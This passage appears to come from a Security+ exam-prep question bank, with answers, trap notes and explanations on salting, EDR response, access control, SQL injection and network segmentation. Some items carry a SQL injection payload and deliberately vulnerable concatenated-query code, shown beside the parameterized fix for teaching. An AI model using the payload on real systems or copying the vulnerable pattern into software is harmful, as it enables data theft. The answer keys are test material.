Option C is correct because using a unique salt per password ensures that even if two users choose the same password (e.g., 'Summer2026!'), their stored hashes will differ, eliminating the repeated-value issue. The salt also defeats precomputed rainbow tables, because a table built for unsalted hashes no longer matches any stored value. Additionally, adaptive hash functions like bcrypt or Argon2 are deliberately slow, so even an attacker who knows the salts must pay that cost for every guess, which makes offline cracking after a breach far more expensive.

Exam trap

CompTIA often tests the misconception that encryption (A) or a stronger hash like SHA-256 (B) is sufficient for password storage, but the trap is that encryption is reversible and unsalted hashes are still vulnerable to rainbow tables, whereas the correct answer requires both salting and an adaptive, slow hash function.

How to eliminate wrong answers

Option A is wrong because encrypting passwords with AES and a shared key does not prevent identical passwords from producing identical ciphertexts (the repeated-value issue remains), and if the key is compromised, all passwords are exposed; encryption is reversible, unlike hashing. Option B is wrong because SHA-256 without a salt produces the same hash for the same password, directly causing the repeated-value issue, and unsalted hashes are trivially vulnerable to rainbow-table attacks. Option D is wrong because adding a digital signature to each password record does nothing to address identical password hashes or rainbow-table risks; signatures verify integrity/authenticity, not protect against precomputation attacks.
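The contrast the question describes, as an added example that is not part of the question bank: unsalted SHA-256 (option B) produces identical stored values for identical passwords and matches a precomputed table, while a per-user salt with an adaptive hash (option C) does neither. hashlib.scrypt is used as a standard-library stand-in for bcrypt or Argon2; the user records and the small precomputed table are constructed sample data.

```python
"""Added example, not from the question bank: why a per-user salt plus an
adaptive hash fixes both the repeated-value finding and the rainbow-table
risk. hashlib.scrypt stands in for bcrypt or Argon2 here because it is in
the Python standard library; the storage and verification structure is
the same for those algorithms."""
import hashlib
import hmac
import os
from typing import Dict, List, Optional

# Constructed sample data: two users who chose the same password.
USERS: Dict[str, str] = {"alice": "Summer2026!", "bob": "Summer2026!"}

# scrypt work factors. Raising N makes every guess cost more CPU and memory.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1

# A constructed stand-in for a precomputed (rainbow) table: a map from an
# unsalted SHA-256 digest back to the plaintext that produced it.
PRECOMPUTED_TABLE: Dict[str, str] = {
    hashlib.sha256(p.encode()).hexdigest(): p
    for p in ["password", "Summer2026!", "letmein"]
}


def unsalted_sha256(password: str) -> str:
    """Option B: the same password always gives the same stored value."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Option C: a fresh random salt per record plus an adaptive hash.
    Stored form: scrypt$N$r$p$<salt hex>$<digest hex>, so the verifier
    can recover the salt and parameters later."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return "$".join(["scrypt", str(SCRYPT_N), str(SCRYPT_R), str(SCRYPT_P),
                     salt.hex(), digest.hex()])


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and parameters; compare in constant time."""
    try:
        algo, n, r, p, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "scrypt":
        return False
    candidate = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                               n=int(n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def has_repeated_values(stored_values: List[str]) -> bool:
    """The breach finding: do any two records share an identical stored value?"""
    return len(set(stored_values)) < len(stored_values)


def table_lookup(stored_value: str) -> Optional[str]:
    """Simulated rainbow-table attack: succeeds only when the stored value is a
    bare, unsalted hash of a password that was precomputed."""
    return PRECOMPUTED_TABLE.get(stored_value)


if __name__ == "__main__":
    weak = {u: unsalted_sha256(p) for u, p in USERS.items()}
    strong = {u: hash_password(p) for u, p in USERS.items()}
    print("unsalted SHA-256 repeats:", has_repeated_values(list(weak.values())))
    print("salted scrypt repeats:   ", has_repeated_values(list(strong.values())))
    print("table hit (unsalted):", table_lookup(weak["alice"]))
    print("table hit (salted):  ", table_lookup(strong["alice"]))
    print("verify alice:", verify_password("Summer2026!", strong["alice"]))
```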

634
Multi-Select (hard)

EDR on a finance workstation shows Outlook launching mshta.exe, followed by a scheduled task named UpdateSvc_91 and repeated HTTPS beacons to a newly registered domain. The user is still working and has not rebooted. Which two telemetry sources would best help the analyst confirm the initial execution path and determine whether the host has communicated with other suspicious infrastructure? Select two.

Select 2 answers
A. EDR process tree and parent-child execution telemetry, because it reveals the original application that launched the script host.
B. Proxy or secure web gateway logs, because they show outbound destinations, categories, and repeated beacons to external sites.
C. Spooler service logs, because mshta.exe commonly prints documents before starting network activity.
D. RAID controller logs, because they show whether the workstation’s storage hardware is failing.
E. NTP synchronization logs, because time drift is the most likely cause of the alert.
Answers: A, B

The process tree shows the execution chain from Outlook to mshta.exe and any child processes that followed. That is the best way to confirm whether the attachment or message initiated the suspicious activity. It also helps distinguish user-driven execution from unrelated background activity.

Why this answer

Option A is correct because EDR process tree and parent-child execution telemetry directly reveal the initial execution path, showing that Outlook launched mshta.exe. This allows the analyst to trace the attack back to the original vector (e.g., a malicious email attachment or link) and understand how the script host was invoked, which is critical for identifying the root cause of the compromise.

Exam trap

The trap here is that candidates may overlook the importance of parent-child process telemetry and instead focus on irrelevant logs like Spooler or RAID, failing to recognize that the initial execution path is the key to understanding the attack vector.

635
MCQ (medium)

An organization is redesigning access for its HR portal. HR staff need to update employee records, managers need to approve leave requests, and payroll staff need access to salary data, but no single user should receive all of those permissions by default. What is the best access model?

A. Create separate roles for HR, managers, and payroll, and grant only the permissions needed for each job function.
B. Assign everyone the same portal permissions to simplify administration.
C. Give every manager full HR and payroll access so approvals are faster.
D. Use one shared administrator account for all HR actions to keep audits simple.
Answer: A

This follows role-based access control and least privilege. Each role gets only the permissions required for its work, which reduces the chance of accidental or unauthorized access across sensitive HR functions.

Why this answer

Option A is correct because Role-Based Access Control (RBAC) assigns permissions based on job functions, ensuring that HR staff, managers, and payroll personnel receive only the privileges necessary for their roles. This enforces the principle of least privilege and prevents any single user from inheriting all permissions by default, which aligns with the organization's security requirement.

Exam trap

The trap here is that candidates may confuse RBAC with simpler models like DAC or MAC, or assume that convenience (e.g., faster approvals) justifies overriding least privilege, but the exam emphasizes that role separation and minimal permissions are mandatory for secure access design.

How to eliminate wrong answers

Option B is wrong because assigning everyone the same portal permissions violates the principle of least privilege, granting excessive access to users who do not need it and increasing the risk of unauthorized data exposure or modification. Option C is wrong because giving every manager full HR and payroll access bypasses role separation, allowing managers to view salary data and update employee records without need, which could lead to privilege escalation and compliance violations. Option D is wrong because using one shared administrator account eliminates accountability and audit trails, making it impossible to attribute actions to specific users and violating non-repudiation principles.

636
MCQ (medium)

EDR flags a workstation after a word processor launches encoded PowerShell and the host begins contacting a rare domain over HTTPS. The user is still active. What is the best containment action from the EDR console?

A. Isolate the endpoint from the network while keeping it powered on.
B. Delete the suspicious PowerShell process from the console and close the alert.
C. Reimage the workstation immediately to return it to a clean state.
D. Power the workstation off and disconnect the SSD to preserve data.
Answer: A

This is the best containment step because it stops the suspected malware from communicating outward or moving laterally, while preserving the live system for follow-up investigation. Keeping the machine powered on protects volatile evidence such as memory, processes, and active connections. EDR isolation is especially useful when the user is still logged in and the host may still contain useful artifacts that would be lost by immediate shutdown.

Why this answer

Isolating the endpoint from the network while keeping it powered on is the best containment action because it immediately cuts off the command-and-control (C2) communication over HTTPS to the rare domain, preventing further data exfiltration or lateral movement, while preserving volatile memory and running processes for forensic analysis. This aligns with incident response best practices where containment must prioritize stopping the threat without destroying evidence.

Exam trap

The trap here is that candidates often choose to kill the process or power off the system, mistakenly believing that stopping the immediate malicious activity is sufficient, without understanding that containment must preserve forensic evidence and prevent re-infection or lateral movement.

How to eliminate wrong answers

Option B is wrong because deleting the suspicious PowerShell process from the console does not remove the underlying malware or persistence mechanism, and the endpoint remains connected to the network, allowing the attacker to re-establish C2 or execute additional payloads. Option C is wrong because reimaging the workstation destroys all forensic evidence, including volatile memory, logs, and artifacts that could reveal the attack vector, scope, and indicators of compromise, which is premature before a proper investigation. Option D is wrong because powering the workstation off and disconnecting the SSD destroys volatile memory (e.g., running processes, network connections, encryption keys) that are critical for understanding the attack, and it prevents live response actions such as memory acquisition or process analysis.

637
MCQ (easy)

During testing, a login form returns all user records when the tester enters ' OR '1'='1 in a username field. What is the best fix for this issue?

A. Hide database error messages from the login page only
B. Use parameterized queries or prepared statements
C. Require users to change passwords more often
D. Move the login page to a different URL
Answer: B

Parameterized queries separate user input from SQL commands, which prevents the database from treating input as executable code.

Why this answer

The SQL injection attack ' OR '1'='1 bypasses authentication by always evaluating to true, returning all user records. Parameterized queries (prepared statements) separate SQL logic from user input, preventing the injected string from altering the query structure. This is the industry-standard mitigation for SQL injection vulnerabilities.

Exam trap

The trap here is that candidates often choose hiding error messages (Option A) because they confuse symptom masking with root-cause remediation, but the exam tests the principle that input validation and parameterized queries are the only reliable fix for SQL injection.

How to eliminate wrong answers

Option A is wrong because hiding error messages is a defense-in-depth measure that does not prevent the SQL injection itself; the attack still succeeds even if errors are hidden. Option C is wrong because password rotation policies do not address the root cause of SQL injection; they only reduce the window of compromised credentials. Option D is wrong because moving the login page to a different URL does not fix the vulnerability; the same injection would work on the new URL if the code remains unchanged.
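The vulnerable lookup the question describes beside its parameterized fix, as an added example that is not part of the question bank. The in-memory SQLite user table is constructed sample data; the functions and names are this example's own.

```python
"""Added example, not from the question bank: the login lookup built by
string concatenation (the vulnerable code the question describes) beside
the parameterized version that fixes it. The user table is constructed
in-memory here as sample data."""
import sqlite3
from typing import List, Tuple

Record = Tuple[int, str]


def make_db() -> sqlite3.Connection:
    """Constructed sample: three users in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b"), ("carol", "hash-c")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, username: str) -> List[Record]:
    """Vulnerable: the input is spliced into the SQL text, so a quote in the
    input ends the string literal and the rest is parsed as SQL syntax."""
    sql = f"SELECT id, username FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, username: str) -> List[Record]:
    """Fixed: a placeholder keeps the SQL text constant; the driver passes the
    value separately, so it is compared as data and can never alter the query."""
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tester_input = "' OR '1'='1"  # the string from the question
    print("vulnerable:", vulnerable_lookup(db, tester_input))  # every record
    print("parameterized:", safe_lookup(db, tester_input))     # no match
```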

638
MCQ (hard)

Based on the exhibit, which improvement best addresses the biggest cryptographic risk?

TLS inventory:
- edge-vpn01 and edge-vpn02 present the same certificate and private key
- private key file stored in a shared SMB folder
- admins copy the key manually during maintenance
- compromise of either gateway would expose the file path to the same share

A. Place the private key in an HSM or cloud key vault and issue unique keys or certificates per gateway.
B. Increase the certificate expiration to five years to reduce renewal work.
C. Keep copying the same key everywhere so failover is easier to manage.
D. Disable certificate validation to avoid user-facing outages.
Answer: A

An HSM or vault protects the key from export, and unique keys reduce the impact if one gateway is compromised.

Why this answer

Option A is correct because the biggest cryptographic risk is the shared private key stored in an SMB share, which violates the principle of least privilege and creates a single point of compromise. Using a Hardware Security Module (HSM) or cloud key vault ensures the private key is never exposed in plaintext, and issuing unique keys per gateway eliminates the risk that compromising one gateway exposes the key for all others. This directly addresses the core issue of key confidentiality and isolation.

Exam trap

The trap here is that candidates may think certificate expiration or failover convenience are the primary concerns, when the real risk is the shared private key's exposure and lack of isolation, which undermines the entire TLS trust model.

How to eliminate wrong answers

Option B is wrong because increasing certificate expiration to five years does not address the fundamental risk of a shared, exposed private key; it actually increases the window of exposure if the key is compromised. Option C is wrong because continuing to copy the same key everywhere perpetuates the insecure practice of key sharing, making failover easier at the cost of catastrophic security failure if any gateway is breached. Option D is wrong because disabling certificate validation removes the entire security benefit of TLS, allowing man-in-the-middle attacks and completely undermining confidentiality and integrity.

639
MCQ (easy)

A file server suddenly renames documents, creates ransom notes, and users can no longer open their files. Which malware type is most likely involved?

A. Spyware
B. Ransomware
C. Rootkit
D. Worm
Answer: B

Ransomware encrypts or blocks access to data and demands payment for recovery. Renaming files and leaving ransom notes are classic signs, especially when users can no longer open shared documents.

Why this answer

Ransomware is the correct answer because it specifically encrypts files and demands payment for decryption. The symptoms—documents being renamed, ransom notes appearing, and users losing access to their files—are classic indicators of ransomware activity, which typically uses strong encryption algorithms like AES or RSA to lock files.

Exam trap

The trap here is that candidates may confuse the file-renaming and note-creation behavior with a logic bomb or virus, but the core differentiator is the extortion demand and encryption-based access loss, which is unique to ransomware.

How to eliminate wrong answers

Option A is wrong because spyware is designed to covertly gather information (e.g., keystrokes, browsing habits) without altering or encrypting files; it does not rename documents or create ransom notes. Option C is wrong because a rootkit provides persistent, stealthy access to a system by hiding its presence (e.g., hooking system calls or modifying kernel data structures), but it does not directly rename files or demand ransoms.

640
Multi-Select (medium)

An EDR alert shows suspicious PowerShell activity on a remote employee laptop, and the user is still logged in to cloud applications. Which two response actions are best if the device is believed to be actively compromised? Select two.

Select 2 answers
A. Isolate the endpoint through the EDR tool or quarantine its network access.
B. Collect a live response package or volatile data before cleanup begins.
C. Power off the laptop immediately to stop the activity as fast as possible.
D. Wait until the user returns the laptop to the office for physical inspection.
E. Remove the EDR agent so the attacker cannot detect the investigation.
Answers: A, B

Network isolation is the fastest way to stop additional attacker communication, lateral movement, and command execution from the compromised laptop. It contains the incident while preserving the system state for investigation. EDR quarantine is particularly useful for remote devices because it can be applied without physical access to the endpoint.

Why this answer

Option A is correct because isolating the endpoint via the EDR tool or quarantining its network access immediately stops the attacker's ability to communicate with command-and-control servers, preventing lateral movement and further data exfiltration. This containment action is a critical first step in incident response for an actively compromised device, as it preserves the integrity of the investigation while halting malicious activity.

Exam trap

The trap here is that candidates confuse 'stopping the activity' with 'powering off the device,' failing to recognize that volatile data collection must precede any shutdown to preserve forensic evidence.

641
MCQ (easy)

A help desk team wants guest Wi-Fi users to access only the internet and nothing on the internal corporate network. Which control should the network team implement at the wireless edge?

A. A single shared password for all guest users
B. An ACL or firewall rule set that blocks guest network access to internal subnets
C. A stronger DNS server
D. A longer Wi-Fi passphrase rotated monthly
Answer: B

An ACL or firewall rule can explicitly allow internet access while denying routing to internal ranges.

Why this answer

To prevent guest Wi-Fi users from accessing the internal corporate network while allowing internet access, the network team must implement an ACL or firewall rule set at the wireless edge. This control explicitly blocks traffic from the guest VLAN/subnet to internal subnets (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) while permitting outbound traffic to the internet. This is a fundamental network segmentation technique that enforces the principle of least privilege at Layer 3/4.

Exam trap

The trap here is that candidates confuse authentication controls (passwords, passphrase rotation) with network access controls (ACLs, firewall rules), assuming that a strong password or DNS server can prevent lateral movement, when in fact only explicit Layer 3/4 filtering at the edge can enforce network segmentation.

How to eliminate wrong answers

Option A is wrong because a single shared password for all guest users does not restrict network access; it only provides authentication to the SSID, and without ACLs, guests could still reach internal resources. Option C is wrong because a stronger DNS server (e.g., using DNSSEC or a public resolver) does not block traffic to internal subnets; it only improves name resolution security and does not enforce network segmentation. Option D is wrong because a longer Wi-Fi passphrase rotated monthly improves authentication strength but does not control which networks a guest can reach once connected; it is a credential policy, not an access control mechanism.

642
MCQ (easy)

A small company is publishing an internal website to the internet. The security team wants the web server reachable from the internet while keeping the database and file share isolated from direct internet access. Which design is best?

A. Place the web server and database on the same flat internal network behind the firewall.
B. Place the web server in a DMZ and keep the database and file share on a private internal subnet.
C. Place the database in the DMZ and keep the web server on the internal user VLAN.
D. Use a VPN for all users and keep every server on the same subnet.
Answer: B

This is the best design because the internet-facing system is isolated in a DMZ, while sensitive back-end systems stay off the public path. Traffic can be tightly filtered so only the required web-to-database communication is allowed. That reduces exposure if the web server is compromised.

Why this answer

Option B is correct because it implements a DMZ architecture where the web server sits in a publicly reachable network segment while the database and file share reside on a private internal subnet. Even if the web server is compromised, an attacker cannot reach the internal resources directly, because firewall rules limit inbound internet traffic to the DMZ and permit only the specific web-to-database connection from the DMZ into the internal network. This follows the principles of defense in depth and network segmentation as recommended by CompTIA for securing multi-tier applications.

Exam trap

The trap here is that candidates often confuse a DMZ as a place to put all servers that need internet access, but the correct design isolates only the front-end web server in the DMZ while keeping backend services like databases and file shares on a separate internal subnet to prevent direct exposure.

How to eliminate wrong answers

Option A is wrong because placing the web server and database on the same flat internal network behind the firewall exposes the database to direct internet traffic if the web server is compromised, violating the principle of least privilege and network segmentation. Option C is wrong because placing the database in the DMZ exposes it directly to the internet, which defeats the purpose of isolating sensitive data; the web server should be the only component reachable from the internet, with the database kept on a private subnet. Option D is wrong because using a VPN for all users and keeping every server on the same subnet eliminates network segmentation entirely, meaning that if any server is breached, all resources including the database and file share are immediately accessible, and VPN access does not prevent lateral movement within the same subnet.

643
MCQ (medium)

A security analyst is reviewing the perimeter firewall logs. The analyst observes repeated TCP SYN packets from a single external IP address (203.0.113.50) to multiple internal IP addresses on TCP port 3389. The packets are sent with a consistent 50-millisecond interval. There are no subsequent SYN-ACK or RST packets from the internal hosts in the logs. The analyst suspects this is a reconnaissance scan. Which of the following additional log sources would provide the most definitive evidence to confirm this suspicion?

A. DNS query logs from the internal DNS server
B. Web proxy logs from the corporate proxy server
C. Intrusion detection system (IDS) logs from a network-based IDS placed behind the firewall
D. VPN gateway authentication logs
Answer: C

A network-based IDS monitors all traffic and uses signatures to detect reconnaissance activities such as port scans. The IDS logs would provide an alert with the signature name (e.g., 'TCP Port Scan') and details about the source IP and targeted hosts, confirming the scan.

Why this answer

Option C is correct because a network-based IDS placed behind the firewall inspects every packet, including its TCP flags, and can detect the specific pattern of SYN packets with no corresponding SYN-ACK or RST responses, which is characteristic of a SYN scan (a type of reconnaissance scan). The IDS can correlate the consistent 50-millisecond interval and the targeting of TCP port 3389 (RDP) across multiple internal IPs, providing definitive evidence of scanning behavior that firewall logs alone cannot confirm because no session is ever completed.

Exam trap

The trap here is that candidates may think firewall logs alone are sufficient to confirm a scan, but they miss that an IDS provides deeper packet inspection and pattern correlation that definitively identifies reconnaissance behavior, especially when the firewall drops the packets before they reach internal hosts.

How to eliminate wrong answers

Option A is wrong because DNS query logs would only show domain name resolution requests, not TCP SYN packets or port scanning activity; the attacker is using raw IP addresses (203.0.113.50) and targeting TCP port 3389, which does not involve DNS lookups. Option B is wrong because web proxy logs capture HTTP/HTTPS traffic (typically TCP ports 80/443) and would not record direct TCP SYN packets to port 3389 (RDP), as RDP traffic bypasses the proxy unless explicitly routed through it, which is uncommon.

644
MCQ (medium)

An EDR console shows PowerShell launching from a scheduled task, decoding a command from memory, and spawning rundll32.exe. No suspicious executable is written to disk, and the activity stops when the process ends. Which threat best fits this behavior?

A. Trojan downloader
B. Fileless malware
C. Rootkit
D. Worm
Answer: B

Fileless malware executes primarily in memory and often uses trusted tools like PowerShell.

Why this answer

The behavior describes PowerShell decoding a command from memory and spawning rundll32.exe without writing any executable to disk, which is the hallmark of fileless malware. Fileless malware operates entirely in memory, leveraging legitimate system tools (like PowerShell and rundll32) to execute malicious code, and it leaves no persistent file on the filesystem, so activity ceases when the process ends.

Exam trap

CompTIA often tests the misconception that any malware using PowerShell must be a Trojan downloader, but the key differentiator here is the absence of a file written to disk and the memory-only execution, which points directly to fileless malware.

How to eliminate wrong answers

Option A is wrong because a Trojan downloader typically writes a malicious executable to disk and then downloads additional payloads, but here no executable is written to disk. Option C is wrong because a rootkit is designed to hide its presence and maintain persistent kernel-level access, often by modifying system files or drivers, whereas this threat is ephemeral and runs only in user-mode memory without persistence. Option D is wrong because a worm self-replicates across networks to infect other systems, usually by copying itself to remote locations, but this threat does not exhibit self-propagation or network-based replication.

645
MCQ (medium)

A Linux operations team needs to run a nightly script that restarts one service and archives its logs on 60 servers. Security does not want an administrator to log in interactively, and the script should have only the permissions needed for that job. What is the best approach?

A. Use the root account so the job never fails.
B. Create a dedicated service account with only the delegated rights needed, and run the script as a scheduled job.
C. Store an administrator's SSH key inside the script.
D. Have an operator log in and run the commands manually each night.
Answer: B

A dedicated noninteractive account supports automation while keeping permissions tightly scoped to the task. The account can be granted only the ability to restart the specific service and write the required log archive location, rather than full administrator access. Scheduling the job also makes the activity repeatable and auditable. This approach supports least privilege, reduces human error, and avoids interactive logons on every server.

Why this answer

Option B is correct because it follows the principle of least privilege by creating a dedicated service account with only the specific rights needed to restart the service and archive logs. Running the script as a scheduled job (e.g., via cron) eliminates the need for interactive login, satisfying the security requirement. This approach minimizes the attack surface and ensures the job runs automatically without exposing administrative credentials.

Exam trap

The trap here is that candidates often assume root is necessary for system service management, but SY0-701 tests the principle of least privilege and the ability to delegate specific rights via service accounts and sudoers policies.

How to eliminate wrong answers

Option A is wrong because using the root account grants unrestricted superuser privileges, violating the principle of least privilege and increasing the risk of catastrophic errors or compromise. Option C is wrong because storing an administrator's SSH key inside the script exposes the private key to anyone who can read the script, creating a credential theft vulnerability and violating secure key management practices. Option D is wrong because requiring an operator to log in manually each night introduces human error, inconsistency, and violates the security policy that prohibits interactive login.

646
MCQ (medium)

A vulnerability dashboard shows four new findings. Which one should be remediated first by the operations team?

- A low-severity issue on an offline lab VM
- A medium-severity issue on a payroll server with no known exploit
- A critical issue on an internet-facing web server with an available exploit
- A high-severity issue on a test workstation that is not domain joined

A. The low-severity issue on the offline lab VM.
B. The medium-severity issue on the payroll server with no known exploit.
C. The critical issue on the internet-facing web server with an available exploit.
D. The high-severity issue on the test workstation that is not domain joined.
Answer: C

This combines high severity, public exposure, and active exploitability, making it the highest-priority risk.

Why this answer

The critical issue on the internet-facing web server with an available exploit should be remediated first because it combines the highest severity (critical) with an active, exploitable vulnerability on an asset exposed to the public internet. In vulnerability management, remediation priority is determined by risk, which is a function of severity, exploitability, and asset exposure. An internet-facing web server with a known exploit represents an immediate threat that can be remotely compromised, unlike the other findings which are on isolated or less critical systems.

Exam trap

CompTIA often tests the principle that severity alone does not determine priority; candidates must also weigh exploitability and asset exposure. The trap here is assuming that a high-severity issue on any asset (such as the test workstation) should be fixed before a critical issue on an internet-facing server, ignoring that the test workstation is isolated and not domain-joined, which lowers its risk profile.

How to eliminate wrong answers

Option A is wrong because a low-severity issue on an offline lab VM poses minimal risk; the VM is not connected to the network, so exploitation is virtually impossible and remediation can be deferred. Option B is wrong because a medium-severity issue on a payroll server with no known exploit is less urgent; without an available exploit, the likelihood of successful attack is low, and the server, while sensitive, is not directly exposed to the internet. Option D is wrong because a high-severity issue on a test workstation that is not domain joined is isolated from the production domain and likely not accessible from the internet, reducing the attack surface and urgency compared to a critical, exploitable internet-facing server.

647
MCQ (hard)

After a suspected compromise, a server's local tools report sshd listening on port 22, but netstat and the EDR console fail to show the process that owns the socket. A reboot does not remove the issue, and firmware integrity checks pass. Which malware type is most likely installed?

A. Spyware, because hidden software is often used to collect credentials and data.
B. Rootkit, because it is designed to hide processes, drivers, or sockets from normal security tools.
C. Ransomware, because the server remains operational while still hiding evidence.
D. Logic bomb, because the issue persists after reboot and could trigger later.
Answer: B

Rootkit is the best answer because the core clue is stealth: the service exists, but common tools cannot attribute the socket to a process. That suggests kernel- or driver-level concealment rather than a normal user-space infection. The persistence after reboot further supports a deeply embedded implant that survives simple cleanup attempts.

Why this answer

Option B is correct because a rootkit is specifically designed to hide its presence from the operating system and security tools by intercepting system calls (e.g., those used by netstat and EDR) to conceal processes, drivers, and network sockets. The persistence after reboot and clean firmware integrity checks indicate the rootkit is installed at the kernel or boot level, bypassing user-mode detection.

Exam trap

The trap here is that candidates may confuse persistence with logic bombs or assume that any hidden software is spyware, but the key technical indicator is the ability to hide a socket from netstat and EDR while surviving reboot, which is a hallmark of kernel-level rootkits.

How to eliminate wrong answers

Option A is wrong because spyware typically focuses on data collection and does not inherently possess the capability to hide processes or sockets from netstat and EDR; its stealth is usually limited to user-level concealment, not kernel-level hooking. Option C is wrong because ransomware is designed to encrypt files and demand payment, not to persistently hide processes or sockets; its primary goal is disruption, not stealthy persistence. Option D is wrong because a logic bomb is a dormant piece of code triggered by a specific condition (e.g., date or event), not a persistent, actively hiding malware that survives reboot and evades process enumeration.

648
MCQ (hard)

Based on the exhibit, what is the best eradication decision after containment? A quarantined endpoint was found to have a malicious startup item and a scheduled task. The team has already isolated it from the network and preserved memory for analysis.

A. Delete only the update.exe file and reconnect the host once the user confirms it is working.
B. Remove persistence artifacts and rebuild the endpoint from a known-good image before returning it to service.
C. Restore network connectivity now because no encryption was observed.
D. Change the DNS servers for the entire enterprise to block the malware domain.
Answer: B

The host contains a malicious executable plus two persistence mechanisms, so cleanup must remove more than the payload file. Reimaging from trusted media provides the most reliable eradication path, especially when the malware family is already identified and the machine has been quarantined. This reduces the chance of hidden remnants, registry persistence, or tampered system components surviving the response effort.

Why this answer

Option B is correct because after containment (network isolation and memory preservation), the best eradication step is to remove all persistence mechanisms (startup item and scheduled task) and rebuild the endpoint from a known-good image. This ensures that any undetected malware remnants, rootkits, or hidden artifacts are eliminated, preventing reinfection. Simply deleting files or changing DNS does not guarantee the system is clean, and reconnecting without a full rebuild risks lateral movement or data exfiltration.

Exam trap

The trap here is that candidates may choose Option A, thinking that deleting the malicious file is sufficient, but CompTIA emphasizes that persistence artifacts must be removed and a system should be rebuilt from a trusted image to ensure complete eradication.

How to eliminate wrong answers

Option A is wrong because deleting only the update.exe file leaves the scheduled task and startup item intact, and the user's confirmation of functionality does not verify security; the host could still have hidden persistence or other malware. Option C is wrong because restoring network connectivity without eradication ignores the possibility of dormant malware or backdoors, and the absence of encryption does not indicate the system is safe. Option D is wrong because changing enterprise DNS servers is a containment or mitigation step, not an eradication decision; it does not clean the compromised endpoint and may disrupt legitimate traffic.

649
MCQ (easy)

A support portal searches customer records by last name. When a tester enters a single quote into the search field, the application returns a database syntax error. Which attack is most likely possible?

A. SQL injection, because the input may be altering the database query
B. Cross-site scripting, because the page is executing malicious JavaScript in the browser
C. Server-side request forgery, because the server is making internal network calls
D. Cross-site request forgery, because the user is being tricked into submitting a form
Answer: A

A quote causing a database syntax error is a classic sign that user input may be breaking SQL queries.

Why this answer

The single quote character is a common SQL injection test payload. When it triggers a database syntax error, it confirms that the input is being directly concatenated into a SQL query without proper sanitization or parameterization. This allows an attacker to break out of the intended query structure and execute arbitrary SQL commands, making SQL injection the most likely attack.

Exam trap

The trap here is that candidates may confuse a database syntax error with a client-side script error, leading them to choose cross-site scripting, but the error message originates from the database server, not the browser.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) requires the application to reflect or store user input as executable JavaScript in the browser, not cause a server-side database syntax error. Option C is wrong because server-side request forgery (SSRF) involves the server making unintended HTTP requests to internal resources, not manipulating database queries. Option D is wrong because cross-site request forgery (CSRF) tricks an authenticated user into submitting a malicious request, but the error here is a direct database syntax error from input, not a forged request from another site.
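The symptom in this question, and the fix the explanation points at, side by side. This is an added example written for this page, not code from the exam bank; the in-memory SQLite table and customer rows are constructed for the demonstration. `search_concatenated` builds the query the way the vulnerable portal does, so a single quote (or a legitimate surname such as O'Brien) produces a database error; `search_parameterized` binds the value instead, so the same inputs are treated purely as data.

```python
import sqlite3


def make_db():
    """Build a constructed in-memory customer table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (id INTEGER PRIMARY KEY, last_name TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO customers (last_name, email) VALUES (?, ?)",
        [("Smith", "smith@example.com"), ("O'Brien", "obrien@example.com")],
    )
    return conn


def search_concatenated(conn, last_name):
    """Vulnerable pattern: the search term is spliced into the SQL text, so a quote
    in the input changes the statement the database parses."""
    sql = "SELECT last_name, email FROM customers WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, last_name):
    """Hardened pattern: the statement is fixed and the value travels as a bound
    parameter, so the input can only ever be compared as data."""
    sql = "SELECT last_name, email FROM customers WHERE last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()


def probe(search_fn, conn, value):
    """Run one search and report whether the database raised an error, which is
    the symptom the question describes (a syntax error surfaced to the tester)."""
    try:
        return ("ok", search_fn(conn, value))
    except sqlite3.Error as exc:
        return ("db_error", type(exc).__name__)


if __name__ == "__main__":
    db = make_db()
    for fn in (search_concatenated, search_parameterized):
        for term in ("Smith", "'", "O'Brien"):
            print(fn.__name__, repr(term), probe(fn, db, term))
```

The parameterized version also fixes a correctness bug the concatenated one has: a real customer named O'Brien cannot be found at all when quotes are spliced into the statement, which is a useful argument when convincing an application team to change the pattern.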

650
Multi-Select (hard)

A scan returns five findings. Which two should be remediated first based on real-world risk? Select two.
A) Internet-facing SSO gateway, CVSS 8.8, public exploit code, and auth bypass impact.
B) Internal print server, CVSS 9.8, no known exploit, isolated VLAN, no sensitive data.
C) File server with regulated customer records, CVSS 6.5, active exploitation in the wild, reachable from VPN.
D) Lab hypervisor, CVSS 7.5, no exploit, scheduled retirement next month, used only by testers.
E) Dev wiki, CVSS 5.0, no exploit, no sensitive data.

Select 2 answers
A. Internet-facing SSO gateway with public exploit code and authentication-bypass impact.
B. Internal print server on an isolated VLAN with no known exploit and no sensitive data.
C. File server containing regulated customer records, with active exploitation in the wild and VPN reachability.
D. Lab hypervisor that is scheduled for retirement next month and used only by testers.
E. Development wiki with low severity, no exploit, and no sensitive data.
Answers: A, C

The SSO gateway (Option A) is a top-priority remediation because the system is internet-facing, has publicly available exploit code, and can lead to authentication bypass. In practice, exposure and exploitability often outweigh CVSS alone because a compromised SSO service can become a foothold for broad lateral movement and account takeover across many systems.

Why this answer

